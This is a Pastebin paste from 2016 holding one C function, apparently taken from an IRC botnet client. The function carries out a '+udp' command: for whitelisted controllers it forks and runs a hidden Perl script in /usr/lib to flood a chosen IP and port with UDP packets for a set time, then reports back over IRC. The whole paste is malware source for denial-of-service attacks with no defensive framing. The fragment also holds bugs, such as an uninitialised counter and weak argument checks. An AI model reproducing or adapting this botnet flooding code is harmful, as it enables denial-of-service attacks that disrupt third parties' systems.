Advertisement
FR0ST_LXIX

udp

Jun 25th, 2016
116
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.57 KB | None | 0 0
  1. void udp(int sock, char *sender, int argc, char **argv) {
  2. if (strcasecmp(users1,sender) == 0 || strcasecmp(users2,sender) == 0 || strcasecmp(users3,sender) == 0 || strcasecmp(users4,sender) == 0 || strcasecmp(users5,sender) == 0 || strcasecmp(users6,sender) == 0 || strcasecmp(users7,sender) == 0 || strcasecmp(users8,sender) == 0 || strcasecmp(users9,sender) == 0 || strcasecmp(users10,sender) == 0 || strcasecmp(adminuser1,sender) == 0){
  3. if (disabled == 1) {
  4. Send(sock,"NOTICE %s :My commands are disabled!\n",sender);
  5. return;
  6. }
  7. if (UDPON == 0) {
  8. return;
  9. }
  10. unsigned int b;
  11. unsigned long secs2;
  12. time_t start=time(NULL);
  13. if (mfork(sender) != 0) return;
  14. if (argc < 3) {
  15. Send(sock,"NOTICE %s :>bot +udp <IP> <PORT> <PACKETS> <SECONDS>\n",sender);
  16. exit(1);
  17. }
  18. Send(sock,"NOTICE %s :UDP is flooding %s on port %s with %s packets for %s seconds!\n",sender,argv[1],argv[2],argv[3],argv[4]);
  19. chdir("/usr/lib");
  20. char system_sta[256];
  21. snprintf(system_sta, 256, "perl .u %s %s %s %s",argv[1],argv[2],argv[3],argv[4]);
  22. system(system_sta);
  23. secs2=atol(argv[3]);
  24. while(1){
  25. if (b >= 50) {
  26. if (time(NULL) >= start+secs2) break;
  27. b=0;
  28. }
  29. b++;
  30. }
  31. Send(sock,"NOTICE %s :UDP attack finished on %s!\n",sender,argv[1]);
  32. } else {
  33. Send(sock,"NOTICE %s :Your nickname is not on this script.\n",sender);
  34. }
  35. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement